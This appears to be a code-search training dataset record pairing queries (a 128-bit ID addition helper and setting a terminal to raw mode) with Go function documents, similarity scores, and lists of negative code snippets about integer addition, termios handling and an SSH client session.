[ "0.7930486", "0.75865024", "0.7481174", "0.7398153", "0.73943275", "0.73667604", "0.73144025", "0.7308492", "0.7287318", "0.72847265", "0.72703105", "0.7236882", "0.72253644", "0.72095793", "0.7167069", "0.7157974", "0.71352875", "0.7106701", "0.70946306", "0.70377123", "0.6972617", "0.69581544", "0.69413924", "0.69302136", "0.6925906", "0.68995434", "0.6880191", "0.68634033", "0.6851205", "0.6840697", "0.6837491", "0.6796209", "0.6750502", "0.6727506", "0.6715922", "0.6713706", "0.6688104", "0.66875875", "0.6670041", "0.6667396", "0.66628695", "0.6659145", "0.66541386", "0.664684", "0.6644079", "0.6595578", "0.65944624", "0.6590677", "0.6584954", "0.65704983", "0.6562762", "0.65596664", "0.65499383", "0.65489835", "0.6528288", "0.64880896", "0.64876336", "0.6470743", "0.64630556", "0.64555454", "0.6455443", "0.6455443", "0.6455443", "0.6451148", "0.64474124", "0.6439049", "0.6413931", "0.64017504", "0.64017504", "0.64017504", "0.6390217", "0.6383738", "0.6374365", "0.63701105", "0.63489157", "0.63290715", "0.6318283", "0.6318283", "0.63014644", "0.62987196", "0.6296746", "0.6296502", "0.6295847", "0.62909645", "0.6287905", "0.6286334", "0.62829274", "0.62757885", "0.6268959", "0.6265045", "0.62614983", "0.6258796", "0.6247861", "0.6237913", "0.6235497", "0.62339956", "0.6231759", "0.6229635", "0.6226805", "0.622466" ]
0.6274007
88
idAdd :: v + o
func idAdd(v, o id.ID) id.ID { low, borrow := bits.Add64(v.Low, o.Low, 0) high, _ := bits.Add64(v.High, o.High, borrow) return id.ID{High: high, Low: low} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func add(this js.Value, i []js.Value) interface{} {\n\tin1, in2 := getInputValues(i)\n\tsetValueById(i[2].String(), in1+in2)\n\treturn nil\n}", "func _cgoexp_e93fccc2f088_add(a *struct {\n\t\tp0 _Ctype_int\n\t\tp1 _Ctype_int\n\t\tr0 _Ctype_int\n\t}) {\n\ta.r0 = add(a.p0, a.p1)\n}", "func add(x, y int) int", "func add1(x, y int64) int64", "func Add() {\n\tMatch('+')\n\tTerm()\n\tEmitLn(\"ADD (SP)+,D0\")\n}", "func add(this js.Value, args []js.Value) interface{} {\n\ta := args[0].Int()\n\tb := args[1].Int()\n\n\tthis.Set(\"result\", js.ValueOf(a+b))\n\treturn nil\n}", "func add(a int, b int) int", "func add(x int, y int) int {\n\treturn x + y\n}", "func add(x int, y int) int {\n\treturn x + y\n}", "func add(x int, y int) int {\n\treturn x + y\n}", "func add(x int, y int) int {\n\treturn x + y\n}", "func add(x int, y int) int {\n\treturn x + y\n}", "func add(x int, y int) int {\n\treturn x + y\n}", "func add(x int, y int) int {\n\treturn x + y\n}", "func Add(a, operand int) int { return operand + a }", "func add(x, y int) int {\n\treturn x + y\n}", "func add(x, y int) int {\n\treturn x + y\n}", "func add(x, y int) int {\n\treturn x + y\n}", "func add(x, y int) int {\n\treturn x + y\n}", "func add(x,y int) int {\n\treturn x + y\n}", "func (z *Int) Add(x, y *Int) *Int {}", "func add(a int, b int) int {\n\treturn 1\n}", "func (v Vector) Add(o Vector) *Vector {\n\treturn &Vector{v[0] + o[0], v[1] + o[1], v[2] + o[2]}\n}", "func add(ctx *build.Context, x, y ir.Int, k int) ir.Int {\n\tz := ctx.Int(\"sum\", k)\n\tc := ctx.Register(\"c\")\n\tAddInto(ctx, z, x, y, c)\n\treturn z\n}", "func add(a, b int) int {\r\n\treturn a + b\r\n}", "func add(a, b int64) int64 {\n\treturn 1 + 2\n}", "func add(num1 int, num2 int) int {\n\treturn num1 + num2\n}", "func (m *DropMutation) AddObjectID(u uint32) {\n\tif m.addobject_id != nil {\n\t\t*m.addobject_id += u\n\t} else {\n\t\tm.addobject_id = &u\n\t}\n}", "func Add(addend1, addend2 *big.Int) *big.Int { return I().Add(addend1, addend2) }", "func add(x float64,y float64) float64 {\n\treturn x+y\n}", "func (this *NestedInteger) Add(elem NestedInteger) {}", "func (this *NestedInteger) Add(elem NestedInteger) {}", "func (this *NestedInteger) Add(elem NestedInteger) {}", "func IntAdd(x int, y int) int {\n\treturn x + y\n}", "func Add(a, b int64) int64 {\n\treturn a + b\n}", "func (n *bigNumber) add(x *bigNumber, y *bigNumber) *bigNumber {\n\treturn n.addRaw(x, y).weakReduce()\n}", "func Add(t1 TermT, t2 TermT) TermT {\n\treturn TermT(C.yices_add(C.term_t(t1), C.term_t(t2)))\n}", "func (vm *VM) opAdd(instr []uint16) int {\n\ta, b, c := vm.getAbc(instr)\n\n\tvm.registers[a] = (b + c) % 32768\n\treturn 4\n}", "func (s *SeriesIDSet) Add(id uint64) {\n\ts.Lock()\n\tdefer s.Unlock()\n\ts.AddNoLock(id)\n}", "func Add(x int, y int) int {\n\treturn x + y\n}", "func Add(x int, y int) int {\n\treturn x + y\n}", "func Add(x int, y int) int {\n\treturn x + y\n}", "func Add(x int, y int) int {\n\treturn x + y\n}", "func Add(x int, y int) int {\n\treturn x + y\n}", "func Add(a, b int) (rs int) {\n\trs = a + b\n\treturn\n}", "func Add(x, y int) int {\n\treturn x + y\n}", "func Add(x, y int) int {\n\treturn x + y\n}", "func Add(x, y int) int {\n\treturn x + y\n}", "func Add(x, y int) int {\n\treturn x + y\n}", "func Add(x, y int) int {\n\treturn x + y\n}", "func Add(x, y int) int {\n\treturn x + y\n}", "func addi(a, b, c int, r register) register {\n\tr[c] = r[a] + b\n\treturn r\n}", "func Add(a int, b int) int {\n\treturn int(a + b)\n}", "func (i *Number) Add(v Number) *Number {\n\treturn NewNumber(i.value + v.value)\n}", "func AppendIdValue(val0 interface{}, val1 interface{}) (*QueryAst, error) {\n\tast := val0.(*QueryAst)\n\tast.objectId = append(ast.objectId, string(val1.(*token.Token).Lit))\n\n\treturn ast, nil\n}", "func Add (a int, b int) int {\n\treturn a+b\n}", "func Add(a int, b int) int {\n\treturn a + b\n}", "func Add(a int, b int) int {\n\treturn a + b\n}", "func Add(a int, b int) int {\n\treturn a + b\n}", "func Add(a int, b int) int {\n\treturn a + b\n}", "func Add( a *context.Value, b *context.Value ) (*context.Value,error) {\n if a != nil && b != nil {\n switch a.OperationType( b ) {\n case context.VAR_BOOL:\n return context.IntValue( a.Int() + b.Int() ), nil\n case context.VAR_INT:\n return context.IntValue( a.Int() + b.Int() ), nil\n case context.VAR_FLOAT:\n return context.FloatValue( a.Float() + b.Float() ), nil\n case context.VAR_STRING:\n return context.StringValue( a.String() + b.String() ), nil\n case context.VAR_COMPLEX:\n return context.ComplexValue( a.Complex() + b.Complex() ), nil\n }\n }\n\n return nil, errors.New( \"Unsupported type for add\" )\n}", "func VADDPD(ops ...operand.Op) { ctx.VADDPD(ops...) }", "func (cs *ComplexSolids) Add(s solid) {\n\tcs.solids = append(cs.solids, s)\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(a, b int) int {\n\treturn a + b\n}", "func Add(x, y Number) Number {\n\treturn Number{\n\t\tReal: x.Real + y.Real,\n\t\tE1mag: x.E1mag + y.E1mag,\n\t\tE2mag: x.E2mag + y.E2mag,\n\t\tE1E2mag: x.E1E2mag + y.E1E2mag,\n\t}\n}", "func plus(a int, b int) int {\n\treturn a + b\n}", "func plus(a int, b int) int {\n\treturn a + b\n}", "func Bvadd(t1 TermT, t2 TermT) TermT {\n\treturn TermT(C.yices_bvadd(C.term_t(t1), C.term_t(t2)))\n}", "func Add(x, y int) (res int) {\n\treturn x + y\n}", "func addInt(a, b int) int {\n\treturn a + b\n}", "func (v *Vector) AddSet(o Vector) *Vector {\n\tv[0] += o[0]\n\tv[1] += o[1]\n\tv[2] += o[2]\n\treturn v\n}", "func (z *Int) Add(x, y *Int) {\n\tvar (\n\t\tcarry bool\n\t)\n\tz[0], carry = u64Add(x[0], y[0], carry)\n\tz[1], carry = u64Add(x[1], y[1], carry)\n\tz[2], carry = u64Add(x[2], y[2], carry)\n\t// Last group\n\tz[3] = x[3] + y[3]\n\tif carry {\n\t\tz[3]++\n\t}\n}", "func add(number1 int, number2 int) int {\n\tvar sum int = number1 + number2\n\treturn sum\n}", "func (d *distance) add(v int) {\n\td.mu.Lock()\n\tdefer d.mu.Unlock()\n\td.v += v\n}", "func Add(a, b int) int {\n\treturn (a + b)\n}", "func add(x, y int) (answer int, err error) {\n\tanswer = x + y\n\treturn\n}", "func (v *Vector) Plus(a *Vector) *Vector {\n\treturn &Vector{X: v.X + a.X, Y: v.Y + a.Y, Z: v.Z + a.Z}\n}", "func (s *Siegfried) Add(i core.Identifier) error {\n\tswitch i := i.(type) {\n\tdefault:\n\t\treturn fmt.Errorf(\"siegfried: unknown identifier type %T\", i)\n\tcase *pronom.Identifier:\n\t\tif err := i.Add(s.em, core.ExtensionMatcher); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := i.Add(s.mm, core.MIMEMatcher); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := i.Add(s.cm, core.ContainerMatcher); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := i.Add(s.bm, core.ByteMatcher); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := i.Add(s.tm, core.TextMatcher); err != nil {\n\t\t\treturn err\n\t\t}\n\t\ts.ids = append(s.ids, i)\n\t}\n\treturn nil\n}", "func (m *RepairinvoiceMutation) AddUserid(i int) {\n\tif m.adduserid != nil {\n\t\t*m.adduserid += i\n\t} else {\n\t\tm.adduserid = &i\n\t}\n}", "func Add(x, y int) int {\n\t// not using named return value\n\t// meaning is clear from context in this case\n\treturn x + y\n}", "func goAdd(args ...yObj) yObj {\n\tvar (\n\t\tsumt int64 = tIntnum\n\t\tisum int64\n\t\tfsum float64\n\t\trsum rational\n\t\tcsum complex128\n\t)\n\n\targs0 := args[0]\n\tl := length(args0)\n\tif l == 0 {\n\t\treturn yZERO\n\t}\n\tif l == 1 {\n\t\treturn pair(args0).car\n\t}\n\tp := args0\n\tfor i := 0; i < l; i++ {\n\t\tval := pair(p).car\n\t\ttyp := typeOf(val)\n\n\t\tswitch typ {\n\t\tcase tIntnum:\n\t\t\tswitch sumt {\n\t\t\tcase tIntnum:\n\t\t\t\tisum += intnumVal(val)\n\t\t\tcase tFlonum:\n\t\t\t\tfsum += float64(intnumVal(val))\n\t\t\tcase tRatinum:\n\t\t\t\trsum = addRatInt(rsum, intnumVal(val))\n\t\t\tcase tCmplnum:\n\t\t\t\tcsum = complex(real(csum)+float64(intnumVal(val)), imag(csum))\n\t\t\t}\n\t\tcase tFlonum:\n\t\t\tswitch sumt {\n\t\t\tcase tIntnum:\n\t\t\t\tfsum = float64(isum) + flonumVal(val)\n\t\t\t\tsumt = tFlonum\n\t\t\tcase tFlonum:\n\t\t\t\tfsum += flonumVal(val)\n\t\t\tcase tRatinum:\n\t\t\t\tfsum = addRatFlo(rsum, flonumVal(val))\n\t\t\t\tsumt = tFlonum\n\t\t\tcase tCmplnum:\n\t\t\t\tcsum = complex(real(csum)+flonumVal(val), imag(csum))\n\t\t\t\tsumt = tCmplnum\n\t\t\t}\n\t\tcase tRatinum:\n\t\t\tswitch sumt {\n\t\t\tcase tIntnum:\n\t\t\t\trsum = addRatInt(ratinumVal(val), isum)\n\t\t\t\tsumt = tRatinum\n\t\t\tcase tFlonum:\n\t\t\t\tfsum = addRatFlo(ratinumVal(val), fsum)\n\t\t\tcase tRatinum:\n\t\t\t\trsum = addRatRat(rsum, ratinumVal(val))\n\t\t\tcase tCmplnum:\n\t\t\t\tcsum = complex(addRatFlo(ratinumVal(val), real(csum)), imag(csum))\n\t\t\t}\n\t\tcase tCmplnum:\n\t\t\tcmplx := cmplnumVal(val)\n\t\t\tswitch sumt {\n\t\t\tcase tIntnum:\n\t\t\t\tcsum = complex(real(cmplx)+float64(isum), imag(cmplx))\n\t\t\t\tsumt = tCmplnum\n\t\t\tcase tFlonum:\n\t\t\t\tcsum = complex(real(cmplx)+fsum, imag(cmplx))\n\t\t\t\tsumt = tCmplnum\n\t\t\tcase tRatinum:\n\t\t\t\tcsum = complex(addRatFlo(rsum, real(cmplx)), imag(cmplx))\n\t\t\t\tsumt = tCmplnum\n\t\t\tcase tCmplnum:\n\t\t\t\tcsum += cmplx\n\t\t\t}\n\t\t}\n\t\tp = pair(p).cdr\n\t}\n\n\tswitch sumt {\n\tcase tIntnum:\n\t\treturn mkIntnum(isum)\n\tcase tFlonum:\n\t\treturn mkFlonum(fsum)\n\tcase tRatinum:\n\t\treturn mkRatinum(rsum)\n\tcase tCmplnum:\n\t\treturn mkCmplnum(csum)\n\tdefault:\n\t\treturn mkError(mkYerror(errArgTypeMis))\n\t}\n}", "func add(number int, numberTwo int) int {\n\treturn number + numberTwo\n}", "func add(number int, numberTwo int) int {\n\treturn number + numberTwo\n}", "func (v Vector) Add(v1 Vector) Vector {\n\tfor i, x := range v1 {\n\t\tv[i] += x\n\t}\n\treturn v\n}", "func Add(a cty.Value, b cty.Value) (cty.Value, error) {\n\treturn AddFunc.Call([]cty.Value{a, b})\n}", "func add(number, numberTwo int) int {\n\treturn number + numberTwo\n}", "func gfAdd(a, b gfElement) gfElement {\n\treturn a ^ b\n}", "func add(a int, b int) int {\r\n\tvar output = a + b\r\n\treturn output\r\n}" ]
[ "0.67529297", "0.6540365", "0.64769065", "0.64463145", "0.64110214", "0.63479173", "0.63165194", "0.6288132", "0.6288132", "0.6288132", "0.6288132", "0.6288132", "0.6288132", "0.6288132", "0.6278636", "0.6243417", "0.6243417", "0.6243417", "0.6243417", "0.62226516", "0.62191266", "0.6180516", "0.61207145", "0.60927284", "0.6087134", "0.60793084", "0.6054395", "0.6036665", "0.6008524", "0.6002317", "0.5997166", "0.5997166", "0.5997166", "0.59838706", "0.5981048", "0.5953389", "0.593992", "0.5931478", "0.59198296", "0.59174246", "0.59174246", "0.59174246", "0.59174246", "0.59174246", "0.5916741", "0.59076846", "0.59076846", "0.59076846", "0.59076846", "0.59076846", "0.59076846", "0.59076357", "0.58958024", "0.58736646", "0.58729225", "0.58660626", "0.58637583", "0.58637583", "0.58637583", "0.58637583", "0.5862243", "0.58479315", "0.58372617", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.58352464", "0.582654", "0.5825913", "0.5825913", "0.58053845", "0.5804275", "0.5800942", "0.5796775", "0.5790164", "0.5789755", "0.5784961", "0.5782228", "0.57747173", "0.5769665", "0.5768307", "0.5768167", "0.57671916", "0.5760517", "0.5759502", "0.5759502", "0.5757603", "0.5729506", "0.57258505", "0.5725818", "0.5721409" ]
0.774656
0
control the terminal mode Set a tty terminal to raw mode.
func setRawMode(fd int) (*raw.Termios, error) { // make sure this is a tty if !isatty.IsTerminal(uintptr(fd)) { return nil, fmt.Errorf("fd %d is not a tty", fd) } // get the terminal IO mode originalMode, err := raw.TcGetAttr(uintptr(fd)) if err != nil { return nil, err } // modify the original mode newMode := *originalMode newMode.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON) newMode.Oflag &^= syscall.OPOST newMode.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) newMode.Cflag &^= (syscall.CSIZE | syscall.PARENB) newMode.Cflag |= syscall.CS8 newMode.Cc[syscall.VMIN] = 1 newMode.Cc[syscall.VTIME] = 0 err = raw.TcSetAttr(uintptr(fd), &newMode) if err != nil { return nil, err } return originalMode, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (i *In) SetRawTerminal() (err error) {\n\tif !i.isTerminal || os.Getenv(\"NORAW\") != \"\" {\n\t\treturn nil\n\t}\n\ti.state, err = term.SetRawTerminal(i.fd)\n\treturn err\n}", "func SetRawTerminal(fd FileDescriptor) (state *TerminalState, err error) {\n\tvar s *mobyterm.State\n\ts, err = mobyterm.SetRawTerminal(fd)\n\tif s != nil {\n\t\tstate = &TerminalState{\n\t\t\tstate: *s,\n\t\t}\n\t}\n\treturn\n}", "func SetRawTerminalOutput(fd FileDescriptor) (state *TerminalState, err error) {\n\tvar s *mobyterm.State\n\ts, err = mobyterm.SetRawTerminalOutput(fd)\n\tif s != nil {\n\t\tstate = &TerminalState{\n\t\t\tstate: *s,\n\t\t}\n\t}\n\treturn\n}", "func (r *terminal) Start() {\n\tif r == nil {\n\t\treturn\n\t}\n\tfd := int(os.Stdin.Fd())\n\treset, err := enableNonBlockingRead(fd)\n\tif err != nil {\n\t\tlog.Warnf(\"failed to put terminal (fd %d) into raw mode: %v\", fd, err)\n\t\treturn\n\t}\n\tr.reset = reset\n}", "func StartRaw(c *exec.Cmd) (pty *os.File, restore func(), err error) {\n\tpty, err = Start(c)\n\toldState, err := terminal.MakeRaw(int(pty.Fd()))\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treturn pty, func() {\n\t\t_ = terminal.Restore(int(pty.Fd()), oldState)\n\t}, nil\n}", "func makeInputRaw(fd windows.Handle, mode uint32) error {\n\t// See\n\t// -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms686033(v=vs.85).aspx\n\t// -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx\n\n\t// Disable these modes\n\tmode &^= windows.ENABLE_ECHO_INPUT\n\tmode &^= windows.ENABLE_LINE_INPUT\n\tmode &^= windows.ENABLE_MOUSE_INPUT\n\tmode &^= windows.ENABLE_WINDOW_INPUT\n\tmode &^= windows.ENABLE_PROCESSED_INPUT\n\n\t// Enable these modes\n\tmode |= windows.ENABLE_EXTENDED_FLAGS\n\tmode |= windows.ENABLE_INSERT_MODE\n\tmode |= windows.ENABLE_QUICK_EDIT_MODE\n\n\tif vtInputSupported {\n\t\tmode |= windows.ENABLE_VIRTUAL_TERMINAL_INPUT\n\t}\n\n\tif err := windows.SetConsoleMode(fd, mode); err != nil {\n\t\treturn fmt.Errorf(\"unable to set console to raw mode: %w\", err)\n\t}\n\n\treturn nil\n}", "func (p *port) restoreTermios() {\n\tif p.oldTermios == nil {\n\t\treturn\n\t}\n\tif err := tcsetattr(int(p.file.Fd()), p.oldTermios); err != nil {\n\t\t// Warning only.\n\t\tlog.Printf(\"serial: could not restore setting: %v\\n\", err)\n\t\treturn\n\t}\n\tp.oldTermios = nil\n}", "func makeFdIntoRawMode(fd int) (state *terminal.State, err error) {\n\tstate, err = terminal.MakeRaw(fd)\n\treturn state, err\n}", "func MakeRaw(fd uintptr) (*State, error) {\n\t// This doesn't really work. The exec.Command() runs a sub-shell\n\t// so the stty mods don't affect the client process.\n\tcmd := exec.Command(\"stty\", \"-echo raw\")\n\tcmd.Run()\n\treturn &State{}, nil\n}", "func MakeRaw(fd uintptr) (*State, error) {\r\n\tvar oldState State\r\n\tif _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {\r\n\t\treturn nil, err\r\n\t}\r\n\r\n\tnewState := oldState.termios\r\n\tnewState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)\r\n\tnewState.Oflag &^= OPOST\r\n\tnewState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN)\r\n\tnewState.Cflag &^= (CSIZE | PARENB)\r\n\tnewState.Cflag |= CS8\r\n\tnewState.Cc[syscall.VMIN] = 1\r\n\tnewState.Cc[syscall.VTIME] = 0\r\n\r\n\tif _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 {\r\n\t\treturn nil, err\r\n\t}\r\n\r\n\treturn &oldState, nil\r\n}", "func TerminalRestore(fd uintptr, termios *syscall.Termios) error {\n\treturn tcset(fd, termios)\n}", "func MakeRaw(fd int) (*State, error) {\n\ttermios, err := unix.IoctlGetTermios(fd, ioctlReadTermios)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\toldState := State{termios: *termios}\n\n\t// This attempts to replicate the behaviour documented for cfmakeraw in\n\t// the termios(3) manpage.\n\ttermios.Iflag &^= unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON\n\ttermios.Oflag &^= unix.OPOST\n\ttermios.Lflag &^= unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN\n\ttermios.Cflag &^= unix.CSIZE | unix.PARENB\n\ttermios.Cflag |= unix.CS8\n\ttermios.Cc[unix.VMIN] = 1\n\ttermios.Cc[unix.VTIME] = 0\n\tif err := unix.IoctlSetTermios(fd, ioctlWriteTermios, termios); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &oldState, nil\n}", "func MakeRaw(fd int) (*State, error) {\n\tvar oldState State\n\tif _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), syscall.TCGETS, uintptr(unsafe.Pointer(&oldState.termios)), 0, 0, 0); err != 0 {\n\t\treturn nil, err\n\t}\n\tC.MakeRaw(C.int(fd))\n\treturn &oldState, nil\n\n\t// FIXME: post on goland issues this: very same as the C function bug non-working\n\n\t// newState := oldState.termios\n\n\t// newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)\n\t// newState.Oflag &^= OPOST\n\t// newState.Lflag &^= (ECHO | syscall.ECHONL | ICANON | ISIG | IEXTEN)\n\t// newState.Cflag &^= (CSIZE | syscall.PARENB)\n\t// newState.Cflag |= CS8\n\n\t// if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, uintptr(fd), syscall.TCSETS, uintptr(unsafe.Pointer(&newState))); err != 0 {\n\t// \treturn nil, err\n\t// }\n\t// return &oldState, nil\n}", "func MakeRaw(fd uintptr) (*State, error) {\n\tvar state *State\n\tstate, err := SaveState(fd)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// see http://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx for these flag settings\n\tstate.mode &^= (ENABLE_ECHO_INPUT | ENABLE_PROCESSED_INPUT | ENABLE_LINE_INPUT)\n\terr = SetConsoleMode(fd, state.mode)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn state, nil\n}", "func (l *Linenoise) readRaw(prompt, init string) (string, error) {\n\t// set rawmode for stdin\n\tl.enableRawMode(syscall.Stdin)\n\tdefer l.disableRawMode(syscall.Stdin)\n\t// edit the line\n\ts, err := l.edit(syscall.Stdin, syscall.Stdout, prompt, init)\n\tfmt.Printf(\"\\r\\n\")\n\treturn s, err\n}", "func SetIsTerminal(isTerminal int) {\n\tstd.mu.Lock()\n\tdefer std.mu.Unlock()\n\tstd.isTerminal = isTerminal\n}", "func restoreMode(fd int, mode *raw.Termios) error {\n\treturn raw.TcSetAttr(uintptr(fd), mode)\n}", "func newTerminalPrompter() *terminalPrompter {\n\tp := new(terminalPrompter)\n\t// Get the original mode before calling NewLiner.\n\t// This is usually regular \"cooked\" mode where characters echo.\n\tnormalMode, _ := liner.TerminalMode()\n\t// Turn on liner. It switches to raw mode.\n\tptr.State = liner.NewLiner()\n\trawMode, err := liner.TerminalMode()\n\tif err != nil || !liner.TerminalSupported() {\n\t\tptr.supported = false\n\t} else {\n\t\tptr.supported = true\n\t\tptr.normalMode = normalMode\n\t\tptr.rawMode = rawMode\n\t\t// Switch back to normal mode while we're not prompting.\n\t\tnormalMode.ApplyMode()\n\t}\n\tptr.SetCtrlCAborts(true)\n\tptr.SetTabCompletionStyle(liner.TabPrints)\n\tptr.SetMultiLineMode(true)\n\treturn p\n}", "func MakeRaw(f *os.File) error {\n\ttermios, err := getTermios(f)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttermios.Iflag &^= unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON\n\ttermios.Oflag &^= unix.OPOST\n\ttermios.Cflag &^= unix.CSIZE | unix.PARENB\n\ttermios.Cflag |= unix.CS8\n\ttermios.Lflag &^= unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN\n\ttermios.Cc[unix.VMIN] = 1\n\ttermios.Cc[unix.VTIME] = 0\n\n\treturn setTermios(f, termios)\n}", "func Restore(fd int, state *State) error {\n\treturn unix.IoctlSetTermios(fd, ioctlWriteTermios, &state.termios)\n}", "func RestoreTerminal(fd uintptr, state *State) error {\n\treturn SetConsoleMode(fd, state.mode)\n}", "func New() *Terminal {\n\tvar err error\n\tvar width uint\n\n\tt, err := tty.Open()\n\tif err == nil {\n\t\tif w, _, err := t.Size(); err == nil {\n\t\t\twidth = uint(w)\n\t\t}\n\t\tt.Close()\n\t}\n\tif err != nil || width <= 0 {\n\t\tfmt.Fprintf(os.Stderr, \"couldn't determine the width of the terminal, defaulting to %d\", defaultWidth)\n\t\twidth = defaultWidth\n\t}\n\n\treturn &Terminal{\n\t\twidth: width,\n\t\tclearer: strings.Repeat(\" \", int(width)-1),\n\t}\n}", "func setTermios(fd uintptr, req uintptr, termios *Termios) error {\n\t_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, req,\n\t\tuintptr(unsafe.Pointer(termios)))\n\n\tif err != 0 {\n\t\treturn err\n\t}\n\treturn nil\n}", "func termraw(L *lua.LState) int {\n\t_, err := term.MakeRaw(int(os.Stdin.Fd()))\n\tif err != nil {\n\t\tL.RaiseError(err.Error())\n\t}\n\n\treturn 0\n}", "func (r *rawMode) enter() (err error) {\n\tr.state, err = readline.MakeRaw(r.StdinFd)\n\treturn err\n}", "func (s *Switch) RawCommand(cmd string) (string, error) {\n\ts.Lock()\n\tdefer s.Unlock()\n\tfmt.Fprintf(s.buffer, \"%s\\r\\n\", cmd)\n\ts.buffer.Flush()\n\n\tlines, err := s.waitForPrompt()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif err = asError(lines); err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn lines, nil\n}", "func Override(cfg *readline.Config) *readline.Config {\n\tcfg.Stdin = wrappedstreams.Stdin()\n\tcfg.Stdout = wrappedstreams.Stdout()\n\tcfg.Stderr = wrappedstreams.Stderr()\n\n\tcfg.FuncGetWidth = TerminalWidth\n\tcfg.FuncIsTerminal = IsTerminal\n\n\trm := RawMode{StdinFd: int(wrappedstreams.Stdin().Fd())}\n\tcfg.FuncMakeRaw = rm.Enter\n\tcfg.FuncExitRaw = rm.Exit\n\n\treturn cfg\n}", "func tty() {\n\tvar err error\n\n\tsigs := make(chan os.Signal, 512)\n\tsignal.Notify(sigs, os.Interrupt)\n\tsignal.Ignore(unix.SIGTTOU)\n\tgo func() {\n\t\tfor i := range sigs {\n\t\t\tfmt.Println(i)\n\t\t}\n\t}()\n\n\t// N.B. We can continue to use this file, in the foreground function,\n\t// but the runtime closes it on exec for us.\n\tttyf, err = os.OpenFile(\"/dev/tty\", os.O_RDWR, 0)\n\tif err != nil {\n\t\tlog.Printf(\"rush: Can't open a console; no job control in this session\")\n\t\treturn\n\t}\n\t// Get the current pgrp, and the pgrp on the tty.\n\t// get current pgrp\n\tttypgrp, err = unix.IoctlGetInt(int(ttyf.Fd()), unix.TIOCGPGRP)\n\tif err != nil {\n\t\tlog.Printf(\"Can't get foreground: %v\", err)\n\t\tttyf.Close()\n\t\tttyf = nil\n\t\tttypgrp = 0\n\t}\n}", "func (sc *sshclient) runclient(ctx context.Context, address string) error {\n\tconn, err := ssh.Dial(\"tcp\", address, sc.config)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot connect to %v: %v\", address, err)\n\t}\n\tdefer conn.Close()\n\n\tsession, err := conn.NewSession()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot open new session: %v\", err)\n\t}\n\tdefer session.Close()\n\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tconn.Close()\n\t}()\n\n\t/*\n\t\tfd := int(os.Stdin.Fd())\n\t\tstate, err := terminal.MakeRaw(fd)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"terminal make raw: %s\", err)\n\t\t}\n\t\tdefer terminal.Restore(fd, state)\n\t*/\n\tcurrent := console.Current()\n\tdefer current.Reset()\n\n\terr = current.SetRaw()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"terminal make raw: %s\", err)\n\t}\n\n\t// fd2 := int(os.Stdout.Fd())\n\t// w, h, err := terminal.GetSize(fd2)\n\t// if err != nil {\n\t// \treturn fmt.Errorf(\"terminal get size: %s\", err)\n\t// }\n\n\tws, err := current.Size()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"terminal get size: %s\", err)\n\t}\n\n\th := int(ws.Height)\n\tw := int(ws.Width)\n\n\tmodes := ssh.TerminalModes{\n\t\tssh.ECHO: 1,\n\t\tssh.TTY_OP_ISPEED: 14400,\n\t\tssh.TTY_OP_OSPEED: 14400,\n\t}\n\n\tterm := os.Getenv(\"TERM\")\n\tif term == \"\" {\n\t\tterm = 